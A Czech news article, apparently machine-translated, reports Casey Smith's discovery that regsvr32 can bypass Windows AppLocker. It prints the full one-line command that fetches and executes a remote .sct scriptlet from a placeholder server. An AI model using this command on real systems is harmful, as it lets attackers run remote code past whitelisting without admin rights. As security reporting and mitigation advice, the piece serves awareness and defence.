Výzkumník z Colorada, který se jmenuje Casey Smith, zjistil, že Regsvr32 lze použít k obejití AppLocker ve Windows 10, což je velký problém pro uživatele počítačů, zejména pro ty, kteří pracují v obchodním prostředí.

AppLocker byl poprvé představen ve Windows 7 a Windows Server 2008 R2. Je navržen tak, aby správcům umožnil určit, která skupina nebo uživatelé mohou využít některé nebo všechny aplikace na základě jedinečné identity souborů. Pokud jste osoba, která má tendenci používat AppLocker, pak by mělo být všeobecně známo, že lze použít k vytvoření určitých pravidel, která aplikacím umožní jejich spuštění nebo zastavení v jejich stopách.

Pro ty, kteří možná nevědí, lze Regvr32 použít k registraci a zrušení registrace DLL. Nejedná se o nástroj na jedno kliknutí, protože se jedná o obslužný program příkazového řádku, takže pouze pokročilí uživatelé počítačů by se měli snažit využít toho, co nabízí.

Chápeme, že pomocí této techniky to nezmění registr počítačového systému, což administrátorům ztěžuje vědět, zda byly provedeny nějaké změny.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

"Úžasná věc je, že regsvr32 je již na serveru proxy, používá TLS, následuje přesměrování atd. … A … uhádli jste podepsaný výchozí binární MS." Vše, co musíte udělat, je tedy hostit soubor your.sct na místě, které ovládáte, “napsal Smith.

Výše uvedená technika nevyžaduje oprávnění správce a nezmění registr. Skripty lze navíc volat přes HTTP nebo HTTPS. V tuto chvíli společnost Microsoft nevydala opravu tohoto malého problému, takže jedinou možností v tomto okamžiku je blokování programu Regsvr32 pomocí brány Windows Firewall.

Je zajímavé, že softwarový gigant musí ještě odpovědět na tento bezpečnostní problém, kterému čelí jeho operační systém. Nyní, když je venku, očekáváme, že se něco od společnosti dozví spolu s rozhovory o budoucí opravě.